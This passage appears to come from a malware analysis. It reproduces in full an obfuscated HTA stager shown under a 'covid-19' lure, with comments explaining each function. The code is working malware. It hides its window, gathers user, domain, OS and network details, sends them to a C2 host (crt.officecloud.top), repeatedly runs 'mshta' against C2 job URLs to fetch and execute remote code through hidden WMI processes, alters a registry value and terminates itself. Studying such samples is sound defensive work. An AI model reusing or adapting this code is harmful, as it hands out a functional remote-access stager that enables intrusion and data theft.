if (!CanHelp()) {
mainFuncStruct.killSelf();
return;
}
}
if (sn == "undefined") {
mainFuncStruct.funcStruct6.runMshtaFromCNC("");
mainFuncStruct.killSelf();
}
}
<html>
<head>
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" />
<script language="JScript">
// [original HTA] Window-hiding prelude; same logic as the deobfuscated copy above.
window.moveTo(-105,300);window.blur();window.resizeTo(10,15);try
{window.onerror=function(sMsg,sUrl,sLine){return false;}
window.onfocus=function(){window.blur();}}
catch(e){}
// [original HTA] USZOOYWIZS = mainFuncStruct. rsS() reverses string fragments so that ProgIDs and
// keywords ("Scripting.FileSystemObject", "undefined", ...) never appear contiguously.
// BZIYSEPGNF = fileObj, VYAUWFCEQB = shellObj, PALBTPZSUF = cncDomain, BZZUUCGDQU = maybeToken,
// TNHTOGCTIG = emptyIfFirstRun, JPOWZJFUNB = someCNCUrl (C2 job URL), HIJJAGKENR = highNumber,
// GGIAVPXSTH = callbackAfterTimeout (unused).
var USZOOYWIZS={};function rsS(s){return s.split("").reverse().join("");}
USZOOYWIZS.BZIYSEPGNF=new ActiveXObject("Scrip"+rsS("bOmetsySeliF.gnit")+"ject");USZOOYWIZS.VYAUWFCEQB=new ActiveXObject("WScrip"+"t.S"+rsS("lleh"));USZOOYWIZS.PALBTPZSUF="http://crt.officecloud.top/st";USZOOYWIZS.BZZUUCGDQU="REDACTED";USZOOYWIZS.TNHTOGCTIG="";USZOOYWIZS.JPOWZJFUNB="http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";USZOOYWIZS.HIJJAGKENR="999999999999999";USZOOYWIZS.GGIAVPXSTH=function(ms,callback)
{if(USZOOYWIZS.DYPJQVFPFC())
{window.setTimeout(callback,ms);}
else
{var now=new Date().getTime();while(new Date().getTime()<now+ms);callback();}}
// [original HTA] IQSPUIAMOB = killSelf: close the HTA window, WScript.quit(), then WMI-terminate
// the PID from ERDXQCZMRN.LLXQUFFVDG (getOwnPID) via ERDXQCZMRN.IVRPZFVXMC (terminateProcessByPID).
USZOOYWIZS.IQSPUIAMOB=function()
{if(USZOOYWIZS.DYPJQVFPFC())
{try{window["close"]();}catch(e){}
try{window.self["close"]();}catch(e){}
try{window.top["close"]();}catch(e){}
try{self["close"]();}catch(e){}
try
{window.open('','_self','');window["close"]();}
catch(e)
{}}
try
{WScript.quit();}
catch(e)
{}
try
{var pid=USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG();USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC(pid);}
catch(e)
{}}
// [original HTA] DYPJQVFPFC = isRunningInMshta, XTERINGOBR = checkIfWscriptDefined (unused).
// rsS("denifednu") == "undefined".
USZOOYWIZS.DYPJQVFPFC=function()
{return typeof(window)!==rsS("denifednu");}
USZOOYWIZS.XTERINGOBR=function()
{return typeof(WScript)!==rsS("denifednu");}
// [original HTA] SFULCEKQPJ = maybeGenGUID: Math.random()-based scratch-file name generator.
USZOOYWIZS.SFULCEKQPJ=function()
{try
{function s4()
{return Math.floor((1+Math.random())*0x1235612).toString(16).substring(1);}
return s4()+s4()+'-'+s4()+s4()+'-'+s4()+'-'+
s4()+'-'+s4()+s4()+s4();}
catch(e)
{}}
// [original HTA] FSZGCSETMH = funcStruct4 (recon). JPWKKYVEDQ = getSessions: `net1 session`
// elevation probe; PUZLNFITWY.GXJDCREARQ = runCmdToFile.
USZOOYWIZS.FSZGCSETMH={};USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ=function()
{try
{var res=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("(net1 session || echo ofailur)","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");if(res.indexOf("ofailur")==-1)
{return true;}
return false;}
catch(e)
{return false;}}
// [original HTA] MKBDEIYCYP = readOsVersion ("<ProductName>triplestar<build>").
USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP=function()
{try
{var osver=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"triplestar"+osbuild;}
catch(e){}
return"Unknown";}
// [original HTA] CSZTZBQMQU = getDCName (Group Policy history DCName).
USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU=function()
{try
{var DC=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
{return DC;}}
catch(e)
{}
return"Unknown";}
// [original HTA] GTTECATTBE = getArch (PROCESSOR_ARCHITECTURE from the registry).
USZOOYWIZS.FSZGCSETMH.GTTECATTBE=function()
{try
{var arch=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
catch(e){}
return"Unknown";}
// [original HTA] AYRFPFYDFU = cdToTempFolder: captures `cd` output via the fixed file %TEMP%\truew.tmp.
USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU=function()
{try
{var truew=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("cd","%TEMP%\\truew.tmp");return truew;}
catch(e)
{}
return"";}
// [original HTA] PPYJMBWCSC = getRoutingInfo: interface IP of the default route from `route PRINT -4`.
USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC=function()
{try
{var routeprint4=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("route PRINT -4","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
{line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
{if(line[j])
{itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
if(line[j]=="0.0.0.0")
{zerocount+=1;if(zerocount==2)
{correctflag=true;}}}}}
catch(e)
{}
return"";}
// [original HTA] IAPTOFSEZA = getComputerInfo: the first-run beacon string, fields joined by the
// literal " n0body i know " (network IOC). EVOWWBMQYM / RLUXESGUDE are the hard-coded "1252" stubs.
USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA=function()
{var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
{domain=net.UserDomain;}
else
{try{domain=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("echo %userdomain%","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");}catch(h){}finally{domain=domain.split(" \r\n")[0];}}
var info=domain+"\\"+net.Username;if(USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ())
info+="*";info+=" n0body i know "+net.ComputerName;info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.GTTECATTBE();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE();return info;}
// [original HTA] EVOWWBMQYM = chcp and RLUXESGUDE = getSomeCodePageNum, both stubbed to "1252";
// the catch branches are unreachable.
USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM=function()
{try
{return"1252"}
catch(e)
{return"1252";}}
USZOOYWIZS.FSZGCSETMH.RLUXESGUDE=function()
{try
{return"1252"}
catch(e)
{return"437";}}
// [original HTA] JLOOXOZDZT = funcStruct6 (C2 messaging). FEQUSOEKAK = sendDataToCNC (POST),
// ENNXSOYMMH = sendErrorDataToCNC (errno/errname/errdesc headers), KPUKINKNPO = getCncWithJobURL,
// KEYOMPGODE = sendHTTPRequestEmpty (empty-body POST used as the job poll).
USZOOYWIZS.JLOOXOZDZT={};USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK=function(data,headers)
{return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(),data,headers);}
USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH=function(e)
{try
{var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(e.message,headers);}
catch(e)
{}}
USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO=function(jobkey)
{var jobkey=(typeof(jobkey)!=="undefined")?jobkey:USZOOYWIZS.TNHTOGCTIG;return USZOOYWIZS.JPOWZJFUNB+jobkey+"&";}
USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE=function()
{var url=USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO();return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(url);}
// [original HTA] MMTQDJLVYX = runMshtaFromCNC: `mshta <job URL>` (SysWOW64\mshta when fork32Bit),
// created via CMXWOMTDOO.UUNAMVWTME (WMI Win32_Process.Create) with a hidden Run() fallback.
// Note CMXWOMTDOO is a separate object from JLOOXOZDZT here, unlike the deobfuscated transcript.
USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX=function(jobkey,fork32Bit)
{var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="mshta stelsy";if(fork32Bit)
cmd=USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ()+cmd;cmd=cmd.replace("stelsy",USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(jobkey));try{USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);}catch(e){USZOOYWIZS.VYAUWFCEQB.Run(cmd,0,false);}}
// [original HTA] KTFJHNZIRI = funcStruct7 (HTTP transport). PQXJNPIPNZ = getHttpRequestObj
// (rsS("HLMXrevreS.2lmxsM") == "Msxml2.ServerXMLH", rsS("eRpttHniW.pttHniW") == "WinHttp.WinHttpRe"),
// PQXCRNIAHD = setRequestHTTPHeaders (defaults Content-Type: application/json),
// JHFPHAPALS = sendHTTPRequest (sync POST), KEYOMPGODE = sendHTTPRequestEmpty (sync GET, unused).
USZOOYWIZS.KTFJHNZIRI={};USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ=function()
{var http=null;try
{http=new ActiveXObject(rsS("HLMXrevreS.2lmxsM")+"TTP.6.0");http.setTimeouts(~~[],~~[],~~[],~~[]);}
catch(e)
{http=new ActiveXObject(rsS("eRpttHniW.pttHniW")+"quest.5.1");http.setTimeouts(0x7530,0x7530,0x7530,~~[]);}
return http;}
USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD=function(http,headers)
{var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
{try{var value=headers[key];http.setRequestHeader(key,value);}catch(h){}finally{if(key.toUpperCase()=="CONTENT-TYPE")
content=true;}}
if(!content)
http[rsS("Rtes")+"eque"+rsS("Hts")+"eader"]("Content-Type","application/json");}
USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS=function(url,data,headers)
{var data=(typeof(data)!=="undefined")?data:"";var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http.open("POST",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http.send(data);return http;}
USZOOYWIZS.KTFJHNZIRI.KEYOMPGODE=function(url,headers)
{var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http[rsS("po")+"en"]("GET",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http[rsS("es")+"nd"]();return http;}
// [original HTA] ERDXQCZMRN = funcStruct1 (WMI process control). LLXQUFFVDG = getOwnPID (spawns
// `%comspec% /K hostname`, reads the child's ParentProcessId, kills the child),
// IVRPZFVXMC = terminateProcessByPID, ZYGNWLRIBN = getProcessList.
USZOOYWIZS.ERDXQCZMRN={};USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG=function()
{var cmd=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%comspec% /K hostname");var childPid=USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);var pid=-1;var latestTime=0;var latestProc=null;var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd())
{var proc=items.item();try
{if(proc.ProcessId==childPid)
{latestProc=proc;break;}}catch(e)
{}
items.moveNext();}
pid=latestProc.ParentProcessId;latestProc.Terminate();return pid;}
USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC=function(pid)
{var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd())
{var proc=items.item();try
{if(proc.ProcessId==pid)
{proc.Terminate();return true;}}catch(e)
{}
items.moveNext();}
return false;}
USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN=function()
{var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");var query="Select * From Win32_Process";return wmi.ExecQuery(query);}
// [original HTA] XDGAVBPIRF = funcStruct5 (StdRegProv registry writes). ZNGQDUNJPL = HKCR,
// RZJJYUNYBI = HKCU, JLKBWUKRUQ = HKLM; RGYFSUKIII/PRZCWOLURK/RWWWGIWTOM/NTOSBUVLVG are the
// string/binary/dword/qword dispatch tags; XONKHXSJHM = getWmiRegistryObject,
// VIUNPHBKRR = setRegistryValue.
USZOOYWIZS.XDGAVBPIRF={};USZOOYWIZS.XDGAVBPIRF.ZNGQDUNJPL=0x80000000;USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI=0x80000001;USZOOYWIZS.XDGAVBPIRF.JLKBWUKRUQ=0x80000002;USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII=0;USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK=1;USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM=2;USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG=3;USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM=function(computer)
{var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR=function(hKey,path,key,value,valType,computer)
{var reg=USZOOYWIZS.XDGAVBPIRF.XONKHXSJHM(computer);reg.CreateKey(hKey,path);if(valType==USZOOYWIZS.XDGAVBPIRF.RGYFSUKIII)
reg.SetStringValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM)
reg.SetDWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.NTOSBUVLVG)
reg.SetQWORDValue(hKey,path,key,value);else if(valType==USZOOYWIZS.XDGAVBPIRF.PRZCWOLURK)
reg.SetBinaryValue(hKey,path,key,value);}
// [original HTA] CMXWOMTDOO.UUNAMVWTME = createProcessReturnPID: WMI Win32_Process.Create with a
// hidden 1x1 window and CreateFlags 16777216 (0x01000000, CREATE_BREAKAWAY_FROM_JOB). Children
// are typically parented by WmiPrvSE.exe. This object is distinct from JLOOXOZDZT (C2), which the
// deobfuscated transcript above merges into one funcStruct6.
USZOOYWIZS.CMXWOMTDOO={};USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME=function(cmd)
{var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
// [original HTA] PUZLNFITWY = funcStruct3 (shell). GXJDCREARQ = runCmdToFile: caret-escaped
// `cmd /c %c^oms^pec%^ /q /c chcp 1252 & <cmd> 1> <file> 2>&1`, hidden, waited on, output read via
// WXUXMBSDFO.KPPKUQVGHI then deleted. DLWSGBGTRP = shellRunCommand: builds the wrapper `c` but
// runs the raw `cmd` (hidden, non-blocking unless fork=false) -- same quirk as the transcript.
USZOOYWIZS.PUZLNFITWY={};USZOOYWIZS.PUZLNFITWY.GXJDCREARQ=function(cmd,stdOutPath)
{cmd="chcp "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE()+" & "+cmd;var c="cmd /c %c^oms^pec%^ /q /c "+cmd+" 1> "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(stdOutPath);c+=" 2>&1";USZOOYWIZS.VYAUWFCEQB.Run(c,0,true);if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936")
{var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(stdOutPath);}
else
{var data=USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI(stdOutPath);}
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(stdOutPath);return data;}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP=function(cmd,fork)
{var fork=(typeof(fork)!==rsS("denifednu"))?fork:true;var c="cmd /c %c^oms^pe^c% /q /c "+cmd;USZOOYWIZS.VYAUWFCEQB.Run(cmd,5-5,!fork);}
// [original HTA] WXUXMBSDFO = funcStruct2 (file system). QUMMKJWDNW = expandEnvStrings,
// KKJQGQQLNJ = getSystemFolder (SysWOW64\ if present, else System32\).
USZOOYWIZS.WXUXMBSDFO={};USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW=function(path)
{return USZOOYWIZS.VYAUWFCEQB.ExpandEnvironmentStrings(path);}
USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ=function()
{var base=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(USZOOYWIZS.BZIYSEPGNF.FolderExists(syswow64))
return syswow64;return base+"\\System32\\";}
// [original HTA] JOUFZBIORZ = readFileUntilSuccess: poll up to 180 times with `ping 127.0.0.1 -n 2`
// as the sleep, read as ASCII; a read error retries without counting.
USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ=function(path)
{var loopcount=0;while(true)
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0)
{try
{var fd=USZOOYWIZS.BZIYSEPGNF.OpenTextFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
catch(e)
{USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);continue;}}
else
{loopcount+=1;if(loopcount>180)
{return"";}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}}
// [original HTA] KPPKUQVGHI = readFileUntilSuccess2: optional "Status: NotExist" report to the C2
// (rsS("sut"+"atS") == "Status"), optional `certutil -encode` base64 pass, otherwise a raw
// OpenAsTextStream read. Neither optional flag is set by any caller in this file.
USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI=function(path,exists,certutil)
{var exists=(typeof(exists)!==rsS("denifednu"))?exists:false;var certutil=(typeof(certutil)!==rsS("denifednu"))?certutil:false;if(!USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&exists)
{var headers={};headers[rsS("sut"+"atS")]="Not"+"Exist";USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK("",headers);return"";}
var loopcount=0;while(true)
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0)
{if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936"||certutil)
{var newout="%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".l"+"og";USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("certut"+"il -encode "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)+" "+newout);var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(newout);USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(newout);}
else
{var fp=USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
return data;}
else
{loopcount+=1;if(loopcount>180)
{return"";}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}}
// [original HTA] KOTINHYPQW = shellDeleteFile, immediately followed by the entry point: with
// TNHTOGCTIG ("") != "prfx", write HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\
// MaxScriptStatements = 0xFFFFFFFF, POST the recon string, spawn `mshta <C2 URL>`, self-terminate.
// The "prfx" stage runs CanHelpTimeout under mshta or CanHelpLoop under cscript/wscript.
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW=function(path)
{USZOOYWIZS.BZIYSEPGNF.DeleteFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),true);};try
{if(USZOOYWIZS.TNHTOGCTIG!="prfx")
{if(USZOOYWIZS.DYPJQVFPFC())
{var path="SOFT"+"WARE\\Mi"+"crosoft\\I"+"nternet Explor"+"er\\St"+"yles";var key="Ma"+"xScriptStat"+"ements";USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR(USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI,path,key,0xFFFFFFFF,USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM);}
USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA());try{USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");}catch(e){USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e)}
USZOOYWIZS.IQSPUIAMOB();}
else
{if(USZOOYWIZS.DYPJQVFPFC())
CanHelpTimeout();else
CanHelpLoop();}}
catch(e)
{USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e);}
// [original HTA] CanHelp: one beacon poll (empty POST); 200/201/202 with a body => run
// `mshta <job URL>` (202 => 32-bit mshta); kill-date, other statuses and exceptions return 0.
function CanHelp()
{var epoch=new Date().getTime();var expire=parseInt(USZOOYWIZS.HIJJAGKENR);if(epoch>expire)
{return 0;}
try
{var work=USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE();if(work.status==201||work.status==202||work.status==200)
{if(work.responseText.length>0){var jobkey=work.responseText;USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX(jobkey,work.status==202);}}
else
{return 0;}}
catch(e)
{return 0;}
return 1;}
// [original HTA] CanHelpLoop = InfiniteRunLoop (cscript/wscript: poll until stop, then exit);
// CanHelpTimeout = LimitedRunLoop (mshta: 10 polls, then respawn `mshta <C2 URL>` and exit).
function CanHelpLoop()
{var an="undefined";while(CanHelp());USZOOYWIZS.IQSPUIAMOB();}
function CanHelpTimeout()
{var sn="undefined";for(var i=(1-1);i<(5*5-15);++i)
{if(!CanHelp())
{USZOOYWIZS.IQSPUIAMOB();return;}}
if(sn=="undefined"){USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");USZOOYWIZS.IQSPUIAMOB();}}
</script>
</head>
<body>
covid-19
</body>
</html>